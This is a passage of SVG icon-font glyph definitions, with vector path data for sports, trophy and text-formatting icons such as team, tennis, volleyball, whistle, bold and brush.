<glyph glyph-name="team" horiz-adv-x="1000" unicode="&#xedd2;" d="M799 7h-2c-3 46-6 92-9 138-3 53-21 78-73 92-35 9-71 16-106 23-10 2-18 0-26-8-51-49-114-49-167 1-6 5-10 9-18 7-38-8-77-14-114-24-43-10-69-36-72-83-4-81-10-162-12-243 0-12 5-17 15-20 33-11 68-19 102-24 95-16 191-21 287-10 60 7 119 16 177 33 13 4 19 10 18 25-1 31 0 62 0 93z m-88 76c-7-17-20-35-36-33-19 2-34 19-40 40-10 38-5 43 42 43h4c37 0 47-16 30-50z m-519 73c2 33 14 62 43 81 19 12 40 20 62 24 28 6 57 13 86 18 9 2 12 6 8 15-4 6-1 20-16 14-42-16-88-18-131-32-50-16-82-46-87-103-4-48-7-97-13-145 0-25 0-51 0-76 0-13 3-24 12-33 5-4 11-12 18-10 9 3 4 12 5 19 5 76 9 152 13 228z m653 3c-3 49-19 91-69 109-19 7-38 12-57 17-30 8-61 8-90 21-10 4-15 6-19-7-3-11-5-17 10-20 30-5 59-12 89-17 51-9 93-47 98-91 3-25 4-51 6-76 3-62 6-123 10-189 22 12 33 25 33 48 0 69-7 137-11 205z m-529 350c2-15 8-27 14-40 4-8 10-15 19-17 4-1 3-4 4-6 3-17 8-33 17-49 13-22 31-39 52-54 13-9 25-19 40-25 30-12 60-11 89 5 25 14 49 31 68 54 15 18 27 38 28 63l1 6c0 3 2 5 5 7 11 4 17 13 20 23 4 11 9 22 12 34v14c-1 5-2 10-4 14-3 8-7 15-15 18-2 2-2 4-2 6-1 13 2 26 3 40 4 36-1 70-16 103-4 8-9 16-10 25 0 3-2 4-4 4-7 1-10 5-13 11 0 1-1 3 0 5 4 3 1 4-2 4-5 2-10 1-15 1-3-1-4 0-4 3-1 5-3 9-5 14-1 3-2 3-5 3-10-2-19-2-28 2-5 3-8 7-10 12-4 10-9 17-21 18-3 1-3 3-3 5 0 5 0 11 0 18-5-3-9-6-14-8-6-3-9-1-9 6 0 8 3 15 6 22h-4c-8-3-16-6-21-14-1-3-3-5-4-8-4 7 1 13 4 20-14-4-24-12-32-23-6-6-10-13-15-19-4-4-5-4-7 0 0 1 0 3-1 4 0 1 0 2-1 3-4-2-6-5-8-9-4-7-7-14-11-22-4-8-6-9-14-4-1 1-2 2-2 2-6 6-6 6-12 0-10-11-17-24-23-37-4-8-9-15-16-21-5-4-9-9-14-14 2-2 5-1 7-1 5-1 6-3 4-8-4-9-9-19-14-28-1-1-1-3-2-5 2 0 3 1 5 2 2 0 3 1 5 0 1-2-1-3-1-5-5-12-9-24-14-37 2-1 3 0 4 1 6 2 6 2 6-5-2-21-2-42 0-63 0-1 0-3-2-4-15-12-17-29-15-46z m19 30c3-8 4-16 5-23 1-5 9-10 14-8 2 1 1 2 1 4 0 6-1 12-1 18-3 28 3 55 9 83 4 19 8 39 14 58 2 6 5 12 7 18 6 13 17 19 32 20 14 1 28-1 41-5 18-4 35-3 53 2 14 4 29 6 43 7 17 0 29-8 38-20 10-14 16-30 22-46 5-13 10-26 16-37 1-2 2-4 3-5 10-10 11-23 12-36 0-17 1-33 0-50 0-2-1-6 4-5 4 0 8-1 8 5 1 8 2 16 3 24 5-2 7-6 9-10 3-11 3-22-1-33-3-7-6-14-9-21-1-4-4-8-8-11-2-1-4-3-6-2-7 2-8-3-8-7-2-9-3-17-4-25-3-16-10-30-20-42-21-28-49-48-80-62-26-10-53-8-77 8-16 11-32 21-46 34-24 22-37 48-42 79-1 2-1 4-2 6-1 5-1 10-9 9-6-1-10 3-12 8-5 12-11 24-14 37-2 9 0 18 5 28z m173-119c-6-2-12-2-18 0-4 2-8 3-13 3-10-1-21-5-32-5 8-5 17-9 26-8 5 1 10 1 14-1 10-4 19-4 28-1 5 2 10 2 15 1 8-2 16-1 24 0 1 1 3 1 3 2 0 1-1 2-2 1-9-1-16 4-23 7-8 4-15 4-22 1z m27 116c2-1 4 2 5 3 3 6 8 9 15 11-4-10-3-15 3-20 5-4 11-3 16 1 5 4 6 10 2 19 8-3 13-6 16-13 1-2 2-5 4-3 3 1 2 3 2 6-2 4-4 7-7 9-12 10-32 11-46 4-4-3-8-6-10-10-2-2-3-5 0-7z m-78 15c-10 6-20 8-31 6-11-2-20-7-24-18-1-2-1-4 1-5 3-1 4 0 4 2 3 8 9 11 17 14-3-9-3-14 2-19 5-4 10-5 15-2 8 5 9 12 5 20 7-2 12-5 15-10 0-2 2-4 4-3 2 2 2 4 1 6-2 4-5 7-9 9z m-56 21c5 2 10 3 15 4 12 2 23-1 34-6 6-3 12-1 14 3 2 4-1 7-9 10-12 5-24 7-36 5-10 0-19-4-27-11-4-4-6-9-4-17 3 7 7 10 13 12z m139-3c2-1 5 0 7 1 3 1 6 2 10 3 19 7 42 3 53-11 2 6 1 11-5 15-8 8-19 12-30 12-13 0-26-2-37-8-3-2-5-4-4-8 0-3 3-4 6-4z m-63-104c9-6 18-8 28-3 9 4 14 12 15 22 0 3 0 6-1 8-1 3-2 6-6 5-4-1-3-4-2-7 3-7 0-13-5-17-7-7-17-7-25 0-3 1-5 2-7 0-2-2-1-4 1-6 1-1 1-2 2-2z m-4-73c11-15 38-16 48-2-16-2-32-3-48 2z" />
<glyph glyph-name="tennis-player" horiz-adv-x="1000" unicode="&#xedd3;" d="M638 680c47 0 85 38 85 85 0 47-38 85-85 85-47 0-85-38-85-85 0-47 38-85 85-85z m197-119c-8 93-116 92-116 92h-170c-122-2-118-92-118-92v-8l-1-5c-3 3-5 4-7 5-11 14-22 36-26 69 2 11 2 22 1 33-2 18-8 35-17 52-1-1-17 43-89 71-18 6-29 6-44 5-22-2-42-11-57-26-41-41-33-114 17-164 28-28 65-44 99-44 1 0 45 1 87-32 1-1 2-1 2-2l35-33v-14c0-21 16-37 36-37 5 0 10 1 15 3-12-13-18-29-12-44 7-19 31-27 55-22v-46l-38-221 38-202c0-27 22-49 48-49 27 0 49 22 49 49l-39 208 39 223h22l77-432c0-27 22-48 48-48 27 0 48 22 48 48l-66 554 47 17c22 8 36 26 37 43 0 0 0 49 0 49z m-310-15v-88l-22 22v66h22z m-304 60c-44 43-53 106-20 140 33 33 95 25 140-18 44-44 53-107 20-140-33-34-96-26-140 18z m174-58c-4-4-6-10-6-16-18 12-36 19-51 22 13 4 25 12 35 21 8 8 14 17 18 28 4-21 12-36 19-48-5 0-11-2-15-7z m346-12l-1 10h23l3-1-25-9z" />
<glyph glyph-name="tennis" horiz-adv-x="1000" unicode="&#xedd4;" d="M453 848c-112-10-221-58-307-144-86-86-134-195-144-307 123-14 253-77 361-184 107-108 170-239 184-361 112 10 221 58 307 144 86 86 134 195 144 307-122 14-253 77-361 184-107 108-170 238-184 361z m547-483c-4 123-52 245-146 339-94 94-216 142-339 146 14-107 71-223 167-318 95-96 211-153 318-167z m-1000-30c4-123 52-245 146-339 94-94 216-142 339-146-14 107-71 223-167 318-95 96-211 153-318 167z" />
<glyph glyph-name="tracking" horiz-adv-x="1000" unicode="&#xedd5;" d="M438 746c0 57 46 104 104 104 58 0 104-47 104-104s-46-104-104-104c-58 0-104 46-104 104z m-133-354c12 37 75 250 75 250-38 0-92 4-142-38-50-41-83-112-92-166-8-50 29-67 71-80 42-12 79 5 88 34z m545 143c-7 15-22 23-37 23v42h-42v-58l-116-58-104 107c-7 8-18 15-26 17l-104 25-79-270c-8-50-8-88 42-130l137-113v-228c0-23 19-42 42-42 23 0 42 19 42 42v250c0 11-5 21-13 29l-6 7-98 126 45 186 83-86c8-8 19-12 30-12 6 0 13 1 19 4l106 53v-599h42v620l19 10c20 10 28 35 18 55z m-516-293l-21-134c0 0-80-201-80-201-9-22 1-46 23-54 5-2 10-3 15-3 17 0 32 10 39 26l80 201c3 4 5 9 6 15l17 58c-54 46-79 63-79 92z" />
<glyph glyph-name="trophy-alt" horiz-adv-x="1000" unicode="&#xedd6;" d="M744 737c0 3 0 50 1 82h39v31h-568v-31h40c0-32 0-79 0-82l-162 33s61-334 285-334l4 0c13-14 26-27 40-37-10 0-18-8-18-18 0-10 8-18 19-18h24l-55-231h-41v-218h309v218h-40l-55 231h24c10 0 18 8 18 18 0 10-8 18-18 18h-13c14 10 28 23 41 37l3 0c224 0 286 334 286 334l-163-33z m-608 1l124-33c11-73 46-166 95-235-133 16-196 196-219 268z m266-271c-3 3-88 74-99 320l33 1c10-231 86-294 87-295l-21-26z m216-365v-152h-226v152h226z m27 368c49 69 84 162 96 235l123 33c-23-72-86-252-219-268z m-349-567h408v-53h-408v53z" />
<glyph glyph-name="trophy" horiz-adv-x="1000" unicode="&#xedd7;" d="M644 423c2 0 3 0 5 0 275 0 351 371 351 371h-200c0 6 1 12 1 17h-602c0-5 1-11 1-17h-200s76-371 351-371c2 0 3 0 5 0 15-17 32-33 49-45-12 0-22-10-22-22 0-13 10-23 23-23h29l-67-354h-21v-90h321v90h-20l-68 354h30c12 0 22 10 22 23 0 12-10 22-22 22h-15c17 12 34 28 49 45z m152 331h152c-29-88-106-269-270-289 61 85 104 199 118 289z m-744 0h152c14-90 57-204 118-289-164 20-241 201-270 289z" />
<glyph glyph-name="volleyball-alt" horiz-adv-x="1000" unicode="&#xedd8;" d="M292 240c0-45 0-90 0-135 0-12 0-24-6-35-9-16-23-25-41-25-66 0-132-1-198 0-25 0-45 21-47 45-2 25 15 47 41 51 37 5 75 1 112 2 42 0 42-1 41 41 0 50 1 100 0 150 0 16 6 29 17 40 83 83 165 165 248 248 17 16 29 16 47-1 115-110 227-224 340-337 24-24 24-53 3-73-21-20-49-19-72 4-70 70-141 141-211 212-12 11-17 10-28-1-43-44-86-87-130-130-11-11-13-16 0-28 84-84 168-168 251-251 29-29 23-69-11-84-19-9-39-5-58 14-46 46-93 93-139 140-52 51-103 103-154 154l-5-1z m359 532c54 0 97-43 97-96 0-53-44-98-97-98-53-1-98 44-98 97 0 55 43 97 98 97z m243-233c59 0 107-48 106-108-1-58-49-105-107-105-59 0-107 48-107 107 0 60 47 107 108 106z m-68-157c2 1 3 2 5 3 36 37 73 73 109 110 3 3 6 7 2 9-9 6-18 15-29 3-16-17-33-33-49-49-16-16-31-31-47-46-7-7-4-14 0-20 2-4 3-10 9-10z m66 137c-49 0-90-42-83-83 27 27 55 55 83 83z m52-153c-1 1-1 2-2 3-15 16-30 32-46 46-7 6-10-5-15-9-5-3-9-7-2-13 12-12 25-25 37-37 6-8 12-3 18 0 4 3 9 4 10 10z m-19 89c-5-6-9-12-14-18-3-5 0-8 3-11 12-12 23-23 35-35 13-13 15-12 23 5 3 8 1 12-4 16-11 11-22 22-33 33-2 3-5 5-10 10z m-28-107c-11 10-19 18-27 25-4 4-7 13-14 8-6-4-12-10-13-15-2-7 7-9 12-11 12-5 23-10 42-7z m76 84c7 16 3 27-2 39-8 17-11 17-23 3-5-6-4-9 1-14 8-9 16-19 24-28z" />
<glyph glyph-name="volleyball-fire" horiz-adv-x="1000" unicode="&#xedd9;" d="M684 557c-173 1-318-140-321-313-3-174 141-322 316-324 174-2 322 145 321 319-1 173-142 316-316 318z m262-224c-43 58-88 114-147 158 74-30 123-82 147-158z m-290 182c-47-49-78-104-95-167-9-31-45-23-70-34 0 106 78 203 165 201z m12-142c87-63 144-149 184-248 18-45 2-57-39-52-26-5-41 7-52 30-37 76-85 146-148 203-30 28-19 57-4 79 22 32 42-1 59-12z m-188 58c-36-47 3-129-81-164 9 71 36 122 81 164z m-79-241c-5 21-2 30 8 38 43 31 90 57 142 69 33 8 52-17 59-39 9-24-24-21-38-27-42-18-85-35-122-62-44-32-45 0-49 21z m39-100c-25 29 6 38 22 49 48 30 100 54 154 73 27 10 69-21 69-53-1-11-14-17-24-25-43-37-93-66-144-91-50-25-56 24-77 47z m82-84c58 33 111 62 158 99 9 8 23 28 35 12 14-18 34-38 20-64-30-62-145-91-213-47z m204-15c34 66 95 45 157 51-65-63-73-66-157-51z m179 98c-18 1-15 23-19 35-40 119-112 214-213 288-13 9-49 11-25 40 17 21 30 53 69 41 108-35 241-208 241-322-5-14-12-33-18-52-6-17-18-31-35-30z m-504 359c33 44 55 77 5 120 46 20 83-60 128-1-100 86-250 47-353 157 15-77 45-125 94-162 13-10 40-17 29-40-12-25-37-10-54-3-27 10-53 25-78 41-81 53-131 131-169 220-20-171 55-301 175-410 18-16 38-29 56-45 17-16 39-35 23-61-17-25-43-14-65-5-42 16-77 43-104 80-17 23-34 47-56 78 12-203 208-380 362-387-10 19-20 36-29 54-60 128-49 252 36 364z" />
<glyph glyph-name="volleyball" horiz-adv-x="1000" unicode="&#xedda;" d="M658 824c-51 17-104 26-158 26-215 0-405-138-473-342-43-126-33-262 26-381 60-119 162-208 289-251 51-17 104-26 158-26 215 0 406 138 474 342 87 261-54 544-316 632z m141-199l5-1 4-4c22-25 41-53 57-83l9-18-20-1c-210-10-320-100-367-153l-5-6-8 2c-39 12-73 39-101 81l-5 7 5 7c30 40 147 169 399 169 9 0 18 0 27 0z m-503 80c62 36 133 55 204 55 44 0 88-7 130-21 13-4 26-9 39-15l39-18-42-6c-165-24-267-97-324-155l-14-14-6 19c-18 54-28 107-32 143l-1 8 7 4z m-177-204c19 46 45 88 78 124l16 19 5-25c23-111 84-304 247-340l7-2 2-6c16-38 27-77 33-116l2-16-15 1c-42 4-105 18-174 69-82 60-149 155-201 282l-1 5 1 5z m391-457c-3-32-9-64-19-94l-3-10-10 1c-37 2-73 9-108 20-104 35-188 108-237 206-22 45-36 92-41 141l-5 54 28-46c133-214 297-254 383-258l13-1-1-13z m206-38l-1-5-5-3c-36-21-74-37-115-47l-20-5 5 20c18 77 27 197-30 336l-3 7 6 6c19 20 53 50 107 76l10 4 6-9c35-60 86-189 40-380z m173 214c-12-35-29-69-50-100l-25-36 2 43c5 128-29 223-59 280l-7 15 16 3c38 8 80 12 124 12h10l2-10c14-69 9-140-13-207z" />
<glyph glyph-name="water-bottle" horiz-adv-x="1000" unicode="&#xeddb;" d="M702 748c-37 73-154 83-208 84v18h-113v-71h27v-46h-120v-75h300v75h-121v46h27v20c56-1 152-13 178-66 22-45-8-116-84-207v91h-300v-225h50v-92h-50v-450h300v450h-50v92h50v108l12-11c97 111 131 198 102 259z" />
<glyph glyph-name="whistle-alt" horiz-adv-x="1000" unicode="&#xeddc;" d="M392 417c-151 0-273-123-273-274s122-273 273-273c151 0 274 122 274 273 0 21-3 41-7 61 0 0 115 0 115 0 0 156 226 117 226 117v96h-608z m0-412c-76 0-138 62-138 138 0 77 62 138 138 138s138-61 138-138c0-76-61-138-138-138z m0 242c-57 0-103-46-103-104 0-57 46-103 103-103 58 0 104 46 104 103 0 58-46 104-104 104z m-254 141h-46c24 15 48 31 72 47 9 5 15 19 8 29-21 26-41 53-61 79l100 3c11 0 21 9 21 21v149c22-44 43-88 65-133 6-13 24-13 33-4l81 73v-124c0-12 10-22 22-22l78 3c-16-9-33-19-49-28-24-14-2-51 21-37 42 24 83 47 124 71 18 10 11 41-11 40-47-2-95-4-142-5v149c0 20-23 28-36 15-32-28-64-57-96-85-31 63-62 127-93 191-9 19-40 9-40-11v-221c-40-1-80-2-120-3-14 0-29-18-18-32 24-31 48-63 71-95-37-24-74-49-112-73-17-12-11-40 11-40h117c28 0 28 43 0 43z" />
<glyph glyph-name="whistle" horiz-adv-x="1000" unicode="&#xeddd;" d="M695 702c57 2 104-22 146-61 21-19 6-29-6-39-12-11-16-39-45-17-74 59-110 59-190 11-153-92-306-184-459-276-70-42-83-81-49-158 8-18 16-36 24-54 21-42 44-47 78-14 71 69 140 139 210 208 69 69 160 79 242 28 39-25 78-52 117-76 44-27 80-18 107 26 13 21 25 44 37 66 35 67 15 140-49 180-18 10-23-2-31-10-8-8-14-5-21 1-7 7-10 13-2 21 29 34 59 68 89 102 7 8 13 7 20 0 9-8 13-16 2-24-29-23-7-37 10-52 83-76 97-162 43-261-13-22-24-45-37-66-43-71-126-93-198-51-42 25-83 53-124 79-56 36-106 30-153-16-66-65-131-130-197-196-88-86-167-72-217 40-22 50-50 97-40 156 9 52 33 93 78 120 170 104 341 206 512 309 32 18 65 26 103 24z" />
<glyph glyph-name="win-trophy" horiz-adv-x="1000" unicode="&#xedde;" d="M444 266l16-17c7-7 18-7 25 0 7 7 7 18 0 25l-8 9c16-3 34-3 53-2 1-1 1-2 2-3 155-155 406 11 406 11l-113 112c3 3 7 6 10 9l-337 338c-3-3-6-7-9-11l-113 113s-166-251-11-405c1-1 2-2 3-3-1-18-1-36 2-53-7 7-18 7-25 0-7-7-7-18 0-25l17-17-46-30c-23 8-45 1-70-24-14-14-26-30-34-47l-87-59-11 11-51-51 180-180 51 51-11 11 56 83 13-5 176-257 271 0-382 377 27 39z m352 112l81-81c-67-33-200-82-297-10 78 14 159 51 216 91z m-411 411l81-81c-40-56-77-138-92-215-71 96-22 230 11 296z" />
<glyph glyph-name="align-center" horiz-adv-x="1000" unicode="&#xeddf;" d="M905 314h-810c-1 0-2 0-4 0-17 0-31-16-31-35 0-24 0-48 0-73 0-8 3-16 8-22 7-10 17-13 28-13 269 0 539 0 808 0 2 0 4 0 5 0 8 0 14 3 19 8 6 6 9 13 12 21v85c0 0-1 0-1 1-6 20-16 28-34 28z m79 423c-5 3-11 5-17 6h-934c-1 0-1-1-2-1-19-3-31-17-31-37 0-23 0-46 0-68 0-3 0-6 1-8 2-15 17-29 36-29 309 0 617 0 925 0h3c8 0 15 3 21 8 8 5 11 13 14 21v84c-3 10-8 18-16 24z m-685-352h384c6 0 13 0 19 0 4 0 7 3 10 9 3 6 4 13 6 21v84c-1 0-1 0-1 1-3 20-8 28-17 28h-400c-1 0-2 0-3 0-8-1-14-17-14-36 0-23 0-47 0-71 0-2 0-5 0-7 2-17 8-29 16-29z m474-285h-548c-1 0-2 0-3 0-12-1-22-16-22-37 0-23 0-47 0-70 0-10 2-18 6-25 5-9 12-11 19-11 183 0 367 0 550 0 2 0 3 0 4 0 7 0 11 5 16 12 2 5 3 11 5 17v84c-6 24-11 30-27 30z" />
<glyph glyph-name="align-left" horiz-adv-x="1000" unicode="&#xede0;" d="M845 314h-810c-1 0-3 0-4 0-17 0-31-16-31-35 0-24 0-48 0-73 0-8 3-15 8-22 7-10 16-13 28-13 269 0 539 0 808 0 2 0 4 0 5 0 7 0 14 3 19 8 6 6 9 13 12 21v85c-1 0-1 0-1 1-6 20-16 28-34 28z m139 423c-5 3-11 5-17 6h-934c0 0-1-1-2-1-19-3-31-17-31-37 0-23 0-46 0-68 0-3 0-6 1-8 2-15 17-29 36-29 309 0 617 0 925 0h3c8 0 15 3 21 8 7 5 11 13 14 21v84c-3 10-8 18-16 24z m-968-352h384c7 0 13 0 19 0 4 0 8 3 10 9 3 6 5 13 6 21v84c0 0 0 0 0 1-3 20-8 28-17 28h-401c-1 0-1 0-2 0-9-1-15-16-15-35 0-24 0-48 0-72 0-2 0-5 0-7 2-17 8-29 16-29z m557-285h-548c-1 0-2 0-3 0-13-1-22-16-22-37 0-23 0-47 0-70 0-10 2-18 6-25 5-9 11-11 18-11 184 0 367 0 551 0 1 0 3 0 4 0 6 0 11 5 15 12 3 5 4 11 5 17v84c-5 24-11 30-26 30z" />
<glyph glyph-name="align-right" horiz-adv-x="1000" unicode="&#xede1;" d="M156 314h809c1 0 3 0 4 0 17 0 31-16 31-35 0-24 0-48 0-73 0-8-3-15-7-22-8-10-17-13-29-13-269 0-538 0-808 0-2 0-3 0-5 0-7 0-14 3-19 8-6 6-9 13-12 21v85c1 0 1 0 1 1 6 20 16 28 35 28z m-139 423c5 3 10 5 16 6h934c1 0 1-1 2-1 19-3 31-17 31-37 0-23 0-46 0-68 0-3 0-6-1-8-2-15-17-29-36-29-308 0-617 0-925 0h-3c-8 0-15 3-21 8-7 5-11 13-14 21v84c3 10 8 18 17 24z m967-352h-384c-6 0-13 0-19 0-4 0-7 3-10 9-3 6-5 13-6 21v84c0 0 0 0 0 1 3 20 8 28 17 28h401c1 0 2 0 3 0 8-1 14-16 14-35 0-24 0-48 0-72 0-2 0-5 0-7-2-17-8-29-16-29z m-557-285h548c1 0 2 0 4 0 12-1 21-16 21-37 0-23 0-47 0-70 0-10-2-18-6-25-5-9-11-11-18-11-184 0-367 0-551 0-1 0-3 0-4 0-6 0-11 5-15 12-3 5-4 11-5 17v84c5 24 11 30 26 30z" />
<glyph glyph-name="all-caps" horiz-adv-x="1000" unicode="&#xede2;" d="M6 493c0 36-2 80-6 133 47-2 128-3 241-3 112 0 192 1 239 3-4-53-5-97-5-133 0-22 0-42 2-59h-18c-8 43-19 78-31 103-13 25-27 43-45 54s-38 17-63 17h-18v-445c0-21 2-37 7-47 4-10 12-17 23-20s29-6 53-6v-15c-65 1-114 2-148 2-32 0-80-1-142-2v15c24 0 42 2 53 6 12 3 19 10 24 20 4 10 6 26 6 47v445h-17c-25 0-46-6-64-17s-32-29-44-54c-13-25-23-59-32-103h-18c2 17 3 37 3 59z m520 0c0 36-2 80-6 133 47-2 127-3 240-3 113 0 193 1 240 3-4-53-6-97-6-133 0-22 1-42 3-59h-18c-8 43-19 78-31 103-13 25-28 43-45 54s-38 17-63 17h-18v-445c0-21 2-37 7-47 4-10 12-17 23-20s29-6 53-6v-15c-65 1-115 2-148 2-32 0-80-1-142-2v15c24 0 42 2 53 6 11 3 19 10 24 20 4 10 6 26 6 47v445h-17c-25 0-46-6-64-17s-32-29-44-54c-13-25-23-59-32-103h-18c2 17 3 37 3 59z" />
<glyph glyph-name="bold" horiz-adv-x="1000" unicode="&#xede3;" d="M779 329c53-25 92-55 115-90 24-36 36-74 36-115 0-58-16-108-47-149-31-42-76-73-135-94s-128-31-208-31c-20 0-55 1-104 2-49 1-98 2-148 2-97 0-169-1-217-4v28c31 2 54 5 68 11 15 6 24 17 30 33 5 16 8 42 8 78v700c0 36-3 61-8 78-6 16-15 27-30 33-14 6-37 9-68 11v28c48-3 119-4 215-4 37 0 79 0 125 1s78 2 96 2c76 0 140-10 192-28 52-19 92-45 118-78 26-33 39-72 39-116 0-35-10-70-30-103-20-34-52-63-94-89s-95-45-158-57v-2c84-7 152-22 205-47z m-188 115c24 42 37 98 37 167 0 71-11 124-33 159-23 34-58 52-106 52-25 0-44-3-56-10-12-7-21-19-25-35-4-17-6-43-6-77v-319h60c61 0 104 21 129 63z m-182-520c4-16 14-27 27-33 13-6 34-9 63-9 131 0 196 83 196 248 0 74-19 131-56 169-37 39-97 58-178 58h-60v-357c0-34 3-60 8-76z" />
<glyph glyph-name="brush" horiz-adv-x="1000" unicode="&#xede4;" d="M399 32c-10-8-20-16-30-25-15-12-30-24-45-36-14-12-24-11-37 2-28 25-24 30-7 58 9 17 19 33 26 51-18-13-36-26-54-38-4-3-8-6-13-7-21-5-28 14-40 24-8 7-8 18-4 27 7 15 14 29 21 43 2 3 4 6 4 12-14-7-27-13-41-20-26-13-30-13-50 8-8 8-17 16-24 24-10 10-10 22-2 33 14 18 28 35 41 54-17-8-34-17-50-26-33-17-33-17-59 9-9 9-19 18-28 28-12 13-8 32 9 37 43 15 81 41 119 66 54 38 106 79 156 122 21 17 28 17 47-2 89-88 177-177 266-265 9-10 18-19 27-28 13-13 14-24 2-38-31-37-63-74-94-112-36-44-67-91-92-143-2-6-5-12-7-18-7-23-25-27-43-10-12 12-24 24-36 36-13 13-15 21-7 37 15 30 29 59 43 89 2 2 2 4 3 7l-1 1z m601 672c0-37-11-67-31-93-6-9-13-15-22-21-76-47-151-94-226-142-17-11-31-25-40-44-4-9-4-18 5-26 14-12 27-25 39-40 22-28 23-68-7-94-6-5-11-11-16-16-12-11-24-12-36 0-35 35-70 70-105 105-58 58-117 117-175 175-1 1-2 2-3 3-20 20-20 29 0 49 12 12 23 26 41 30 27 7 50-2 70-20 12-10 23-22 34-34 12-11 17-12 31-4 18 9 31 23 42 40 44 71 89 141 132 212 24 40 60 59 104 64 87 9 163-60 163-144z m-112-3c1 20-16 37-36 37-20 0-37-18-37-37 0-20 17-36 36-36 22 0 37 14 37 36z" />
<glyph glyph-name="clip-board" horiz-adv-x="1000" unicode="&#xede5;" d="M891 275l0 487c0 18-5 34-14 49-13 21-31 36-54 39h-133c2-14 1-29 0-44 0-9 4-11 12-11 42 1 83 0 125 1 8 0 10-2 10-10-1-60-1-120-1-180 0-230 0-460 1-690 0-9-3-12-12-12-102 1-204 1-306 1-115 0-231 0-347 0-6 0-8 1-8 7 1 19 0 39 0 58 0 133 0 267 0 400 0 139 0 277 0 416 0 8 2 10 10 10l125-1c8 0 11 2 10 10 0 15 0 30 0 45h-137c-35-6-61-42-62-79-1-48-1-96-1-144 0-81 0-162 0-244v-263c0-66 0-132 0-198 0-13 3-26 10-38 15-25 39-34 67-34h623c3 0 7 0 10 0 42 2 72 33 72 72v353z m-537 429c97 0 194 0 291 0 8 0 10 3 10 10-1 46 0 91 0 136h-309l0-140c0-7 4-6 8-6z m-45-26c1 19 0 37 0 55 0 6 0 8-7 8-25 0-50 0-75 0-8 0-9-3-9-9 0-54 0-107 0-161l0-301s0-201 0-302c0-8 2-9 9-9 39 0 78 0 117 0 143 0 285 0 427 0 9 0 11 2 11 11 0 126 0 253 0 379v159c0 75 0 150 0 225 0 7-2 8-9 8-24 0-49 0-73 0-7 0-10-1-9-9l0-54c0-8-2-10-10-10-47 0-93 0-140 0-74 0-148 0-221 0-8 0-11 2-11 10z m390-573c-102 0-204 0-306 0-8 0-12 1-11 10 1 8-3 19 2 25 5 4 16 1 24 1 46 0 91 0 137 0v0c51 0 103 0 154 0 8 0 12-1 10-10 0-5 0-11 0-16 2-9-2-10-10-10z m10 135c1-7-2-8-8-8-52 0-104 0-156 0v0c-50 0-100 0-151 0-9 0-12 2-12 12 1 24 0 24 25 24 97 0 195 0 292 0 8 0 12-2 11-10-1-6-1-12-1-18z m-327 238c-1 7 2 9 9 9 52-1 105-1 157-1 50 0 100 0 150 1 8 0 12-2 11-11 0-26 1-26-26-26-46 0-92 0-138 0v0c-51 0-102 0-153 0-8 0-11 2-10 10 1 6 1 12 0 18z m27 117h286c14 0 14 0 14-14 0-22 0-22-22-22h-142c-51 0-103 0-155 0-6 0-8 2-8 8 0 28-1 28 27 28z m-25-219c5 4 17 1 25 1 97 0 193 0 290 1 8 0 12-2 10-11-1-8 4-19-2-24-5-5-15-1-23-1-46-1-92-1-138-1v0c-51 0-102 0-153 0-8 0-12 1-11 10 1 8-4 20 2 25z m-75-271c-18 0-18 0-18 18 0 18 0 18 19 18 17 0 17 0 17-18 0-18 0-18-18-18z m-18 145c0 18 0 18 18 18 18 0 18 0 18-18 0-18 0-18-18-18-18 1-18 1-18 18z m19 91c-19 0-19 0-19 19 0 17 0 17 18 17 18 0 18 0 18-19 0-17 0-17-17-17z m17 128c0-19 0-19-19-19-17 0-17 0-17 16v2c0 18 0 18 19 18 21 0 17 2 17-17z m-17 126c17 0 17 0 17-18 0-18 0-18-17-18-18 0-18 0-19 18 0 19 0 19 19 18z" />
<glyph glyph-name="code-alt" horiz-adv-x="1000" unicode="&#xede6;" d="M108 343c-6 6-6 9 0 14 71 71 141 142 212 213 3 4 6 7 9 10 14 18 11 43-6 58-17 15-41 13-59-5-81-81-162-162-243-243-8-9-17-18-21-30v-20c4-12 13-20 22-29 80-81 161-163 242-244 19-19 44-20 62-2 17 17 16 43-3 61-71 73-143 145-215 217z m878 39c-40 40-79 80-119 120-44 44-89 89-133 133-24 24-63 13-71-20-4-16 2-30 14-42 72-72 143-144 215-215 7-7 6-10 0-15-71-71-142-142-212-213-3-3-5-5-7-7-15-18-14-43 3-59 16-16 41-15 58 1 8 7 15 15 23 23 76 76 151 153 227 229 10 9 16 19 16 33 0 13-5 23-14 32z m-389 236c-19-1-28-13-34-29-49-129-98-257-147-385-12-31-23-61-35-91-9-26 8-52 35-52 16 0 29 10 35 27 53 137 105 273 157 410 9 23 19 46 27 70 10 27-10 53-38 50z" />
<glyph glyph-name="color-bucket" horiz-adv-x="1000" unicode="&#xede7;" d="M996 283l-81 108-56 74c-74-42-217-54-301-58l-2-1c-18-17-47-15-64 4-18 19-18 48 0 65 17 16 45 15 63-3 108 4 217 21 265 45l-58 75c69-2 97-19 107-33 10-13 7-27 7-30-27-56-235-74-335-76 0 1-1 2-1 2-9 10-23 10-32 2-8-8-9-22 0-31 9-9 23-10 32-2 1 1 2 3 3 5 68 2 278 12 340 71 7 6 11 12 15 19l0 1c0 1 9 27-10 52-22 30-70 45-144 45l-70 92c-3 4-7 6-12 6-4 1-9 0-12-3l-367-343c-3-3-4-8-4-12 0-5 2-9 5-12l397-356c7-6 17-6 23 0l291 272c6 6 7 16 1 22z m-698 139c3 3 7 6 11 9 0 1-1 1-2 1-55 3-110 1-163-13-30-7-58-18-82-37-26-21-46-45-56-77-12-38-5-74 16-108 2-2 4-5 6-8h0s12-19 34-30c14-8 42-20 80-9 1 1 1 1 2 1l1 0v0c28 9 48 29 62 58 12 27 19 56 22 85 6 52 29 95 69 128z" />
